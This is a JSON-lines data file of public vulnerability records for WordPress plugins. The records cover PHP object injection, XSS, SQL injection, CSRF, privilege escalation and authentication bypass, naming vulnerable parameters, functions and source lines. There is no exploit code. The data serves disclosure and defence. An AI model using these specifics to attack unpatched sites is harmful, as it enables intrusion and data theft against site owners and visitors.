{"CVE_ID":"CVE-2024-10587","slug":"funnelforms-free","versionImpact":"3.7.4.1","description":"The Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor \u2013 Funnelforms Free plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.7.4.1 via deserialization of untrusted input. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/funnelforms-free\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/funnelforms-free\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/701e6afe-08fa-49c7-a6da-cb266db07c48?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/701e6afe-08fa-49c7-a6da-cb266db07c48?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11855","slug":"koalendar-free-booking-widget","versionImpact":"1.0.2","description":"The Koalendar \u2013 Events & Appointments Booking Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018height\u2019 parameter in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/koalendar-free-booking-widget\\\/trunk\\\/koa-wordpress.php#L29\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/koalendar-free-booking-widget\\\/trunk\\\/koa-wordpress.php#L29\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/koalendar-free-booking-widget\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/koalendar-free-booking-widget\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbbbf5fe-0369-4de6-9b2f-957286b6f394?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbbbf5fe-0369-4de6-9b2f-957286b6f394?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11810","slug":"paygreen-payment-gateway","versionImpact":"1.0.26","description":"The PayGreen Payment Gateway plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'message_id' parameter in all versions up to, and including, 1.0.26 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/paygreen-payment-gateway\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/paygreen-payment-gateway\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e5438f82-2428-44ba-a7c8-e34d80804063?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e5438f82-2428-44ba-a7c8-e34d80804063?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13712","slug":"pollin","versionImpact":"1.01.1","description":"The Pollin plugin for WordPress is vulnerable to SQL Injection via the 'question' parameter in all versions up to, and including, 1.01.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pollin\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pollin\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d4a463b-e447-4fd0-a8df-284ecd6cd975?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d4a463b-e447-4fd0-a8df-284ecd6cd975?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1481","slug":"shortcode-cleaner-lite","versionImpact":"1.0.9","description":"The Shortcode Cleaner Lite plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the download_backup() function in all versions up to, and including, 1.0.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to export arbitrary options.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcode-cleaner-lite\\\/trunk\\\/vendor\\\/codestar\\\/codestar\\\/core\\\/Module\\\/Export.php#L53\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcode-cleaner-lite\\\/trunk\\\/vendor\\\/codestar\\\/codestar\\\/core\\\/Module\\\/Export.php#L53\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/shortcode-cleaner-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/shortcode-cleaner-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/15613da5-f900-4a33-8eec-6c9e52ed30fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/15613da5-f900-4a33-8eec-6c9e52ed30fc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7984","slug":"joy-of-text","versionImpact":"2.3.1","description":"The Joy Of Text Lite  WordPress plugin through 2.3.1 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/07684ecb-5662-4412-8190-7957cfcf7bd3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/07684ecb-5662-4412-8190-7957cfcf7bd3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4631","slug":"profitori","description":"The Profitori plugin for WordPress is vulnerable to Privilege Escalation due to a missing capability check on the stocktend_object endpoint in versions 2.0.6.0 to 2.1.1.3. This makes it possible to trigger the save_object_as_user() function for objects whose '_datatype' is set to 'users',. This allows unauthenticated attackers to write arbitrary strings straight into the user\u2019s wp_capabilities meta field, potentially elevating the privileges of an existing user account or a newly created one to that of an administrator.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profitori\\\/tags\\\/2.1.1.3\\\/profitori.php#L2675\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profitori\\\/tags\\\/2.1.1.3\\\/profitori.php#L2675\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profitori\\\/tags\\\/2.1.1.3\\\/profitori.php#L2679\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profitori\\\/tags\\\/2.1.1.3\\\/profitori.php#L2679\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profitori\\\/tags\\\/2.1.1.3\\\/profitori.php#L2698\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profitori\\\/tags\\\/2.1.1.3\\\/profitori.php#L2698\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profitori\\\/tags\\\/2.1.1.3\\\/profitori.php#L3673\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profitori\\\/tags\\\/2.1.1.3\\\/profitori.php#L3673\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/profitori\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/profitori\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c764811f-e9dc-4c3d-b696-5792e70ff0b6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c764811f-e9dc-4c3d-b696-5792e70ff0b6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6041","slug":"ycontributors","versionImpact":"0.5","description":"The yContributors plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.5. This is due to missing or incorrect nonce validation on the 'yContributors' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ycontributors\\\/trunk\\\/ycontributors_admin.php#L19\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ycontributors\\\/trunk\\\/ycontributors_admin.php#L19\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bd61124-d4af-4c88-be96-579c735b7b49?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bd61124-d4af-4c88-be96-579c735b7b49?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8391","slug":"magic-edge-lite-image-background-remover","versionImpact":"1.1.6","description":"The Magic Edge \u2013 Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018height\u2019 parameter in all versions up to, and including, 1.1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/magic-edge-lite-image-background-remover\\\/tags\\\/1.1.6\\\/MagicEdgeFrontend.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/magic-edge-lite-image-background-remover\\\/tags\\\/1.1.6\\\/MagicEdgeFrontend.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/magic-edge-lite-image-background-remover\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/magic-edge-lite-image-background-remover\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe456de4-4bf3-45aa-938d-8d4561fac44e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe456de4-4bf3-45aa-938d-8d4561fac44e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1865","slug":"yourchannel","versionImpact":"1.2.3","description":"The YourChannel plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check when resetting plugin settings via the yrc_nuke GET parameter in versions up to, and including, 1.2.3. This makes it possible for unauthenticated attackers to delete YouTube channels from the plugin.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34817e32-d5a3-403a-85f0-1d60af8945de?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34817e32-d5a3-403a-85f0-1d60af8945de?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yourchannel\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yourchannel\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yourchannel\\\/trunk\\\/YourChannel.php?rev=2844975#L772\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yourchannel\\\/trunk\\\/YourChannel.php?rev=2844975#L772\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2781","slug":"woo-confirmation-email","versionImpact":"3.5.0","description":"The User Email Verification for WooCommerce plugin for WordPress is vulnerable to authentication bypass via authenticate_user_by_email in versions up to, and including, 3.5.0. This is due to a random token generation weakness in the resend_verification_email function. This allows unauthenticated attackers to impersonate users and trigger an email address verification for arbitrary accounts, including administrative accounts, and automatically be logged in as that user, including any site administrators. This requires the Allow Automatic Login After Successful Verification setting to be enabled, which it is not by default.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-confirmation-email\\\/tags\\\/3.5.0\\\/public\\\/class-xlwuev-woocommerce-confirmation-email-public.php#L506\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-confirmation-email\\\/tags\\\/3.5.0\\\/public\\\/class-xlwuev-woocommerce-confirmation-email-public.php#L506\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1e31357-7fbc-414b-a4f4-53fa5f2fc715?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1e31357-7fbc-414b-a4f4-53fa5f2fc715?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-confirmation-email\\\/tags\\\/3.5.0\\\/public\\\/class-xlwuev-woocommerce-confirmation-email-public.php#L143\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-confirmation-email\\\/tags\\\/3.5.0\\\/public\\\/class-xlwuev-woocommerce-confirmation-email-public.php#L143\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-confirmation-email\\\/tags\\\/3.5.0\\\/public\\\/class-xlwuev-woocommerce-confirmation-email-public.php#L332\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-confirmation-email\\\/tags\\\/3.5.0\\\/public\\\/class-xlwuev-woocommerce-confirmation-email-public.php#L332\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3325","slug":"cms-commander-client","versionImpact":"2.287","description":"The CMS Commander plugin for WordPress is vulnerable to authorization bypass due to the use of an insufficiently unique cryptographic signature on the 'cmsc_add_site' function in versions up to, and including, 2.287. This makes it possible for unauthenticated attackers to the plugin to change the '_cmsc_public_key' in the plugin config, providing access to the plugin's remote control functionalities, such as creating an admin access URL, which can be used for privilege escalation. This can only be exploited if the plugin has not been configured yet, however, if combined with another arbitrary plugin installation and activation vulnerability, the impact can be severe.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca37d453-9f9a-46b2-a17f-65a16e3e2ed1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca37d453-9f9a-46b2-a17f-65a16e3e2ed1?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cms-commander-client\\\/tags\\\/2.287\\\/init.php#L88\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cms-commander-client\\\/tags\\\/2.287\\\/init.php#L88\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2927811\\\/cms-commander-client\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2927811\\\/cms-commander-client\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5621","slug":"wp-responsive-slider-with-lightbox","versionImpact":"1.0","description":"The Thumbnail Slider With Lightbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Image Title field in versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=1263536%40wp-responsive-slider-with-lightbox&new=1263536%40wp-responsive-slider-with-lightbox&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=1263536%40wp-responsive-slider-with-lightbox&new=1263536%40wp-responsive-slider-with-lightbox&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/547c425d-8b0f-4e65-8b8a-c3a3059301fe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/547c425d-8b0f-4e65-8b8a-c3a3059301fe?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-responsive-slider-with-lightbox\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-responsive-slider-with-lightbox\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6493","slug":"depicter","versionImpact":"2.0.6","description":"The Depicter Slider \u2013 Responsive Image Slider, Video Slider & Post Slider plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.6. This is due to missing or incorrect nonce validation on the 'save' function. This makes it possible for unauthenticated attackers to modify the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. CVE-2023-51491 appears to be a duplicate of this issue.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9c907ea-3ab4-4674-8945-ade4f6ff2679?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9c907ea-3ab4-4674-8945-ade4f6ff2679?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3013596\\\/depicter\\\/trunk\\\/app\\\/src\\\/WordPress\\\/Settings\\\/Settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3013596\\\/depicter\\\/trunk\\\/app\\\/src\\\/WordPress\\\/Settings\\\/Settings.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4730","slug":"ladipage","versionImpact":"4.3","description":"The LadiApp plugn for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the init_endpoint() function hooked via 'init' in versions up to, and including, 4.3. This makes it possible for unauthenticated attackers to modify a variety of settings. An attacker can directly modify the 'ladipage_key' which enables them to create new posts on the website and inject malicious web scripts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c4baf2e-7f5e-4954-88f9-76d32f297aab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c4baf2e-7f5e-4954-88f9-76d32f297aab?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L153\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L153\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L175\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L175\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L187\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L187\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8730","slug":"exit-notifier","versionImpact":"1.9.1","description":"The Exit Notifier plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.9.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ddc1aedb-e64f-4b61-a247-c3cdc731f001?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ddc1aedb-e64f-4b61-a247-c3cdc731f001?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/exit-notifier\\\/trunk\\\/includes\\\/class-exit-notifier-settings.php#L707\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/exit-notifier\\\/trunk\\\/includes\\\/class-exit-notifier-settings.php#L707\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10016","slug":"file-upload-types","versionImpact":"1.4.0","description":"The File Upload Types by WPForms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.4.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17988a66-5b48-4f57-96f8-74e539bc875e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17988a66-5b48-4f57-96f8-74e539bc875e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/file-upload-types\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/file-upload-types\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3174398%40file-upload-types&old=3119996%40file-upload-types&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3174398%40file-upload-types&old=3119996%40file-upload-types&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3174398\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3174398\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6628","slug":"all-contact-form-integration-for-elementor","versionImpact":"2.9.9.9","description":"The EleForms \u2013 All In One Form Integration including DB for Elementor plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.9.9.9. This is due to missing or incorrect nonce validation when deleting form submissions. This makes it possible for unauthenticated attackers to delete form submissions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c21f5461-9c1e-48ec-b15f-6a9be1e27b43?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c21f5461-9c1e-48ec-b15f-6a9be1e27b43?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/all-contact-form-integration-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/all-contact-form-integration-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11690","slug":"live-stock-prices-for-wordpress","versionImpact":"1.10.3","description":"The Financial Stocks & Crypto Market Data Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'e' parameter in all versions up to, and including, 1.10.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/live-stock-prices-for-wordpress\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/live-stock-prices-for-wordpress\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/210e9d94-ae2a-4dd9-a151-0bafbac68d18?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/210e9d94-ae2a-4dd9-a151-0bafbac68d18?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13711","slug":"pollin","versionImpact":"1.01.1","description":"The Pollin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'question' parameter in all versions up to, and including, 1.01.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pollin\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pollin\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4beb01c1-2144-4b1f-9d32-cf2725a8d4ae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4beb01c1-2144-4b1f-9d32-cf2725a8d4ae?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13895","slug":"code-snippets-cpt","versionImpact":"2.1.0","description":"The The Code Snippets CPT plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 2.1.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/code-snippets-cpt\\\/trunk\\\/lib\\\/CodeSnippitButton.php#L201\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/code-snippets-cpt\\\/trunk\\\/lib\\\/CodeSnippitButton.php#L201\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65f521f4-1968-4c43-a3f0-b0f81632d7aa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65f521f4-1968-4c43-a3f0-b0f81632d7aa?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
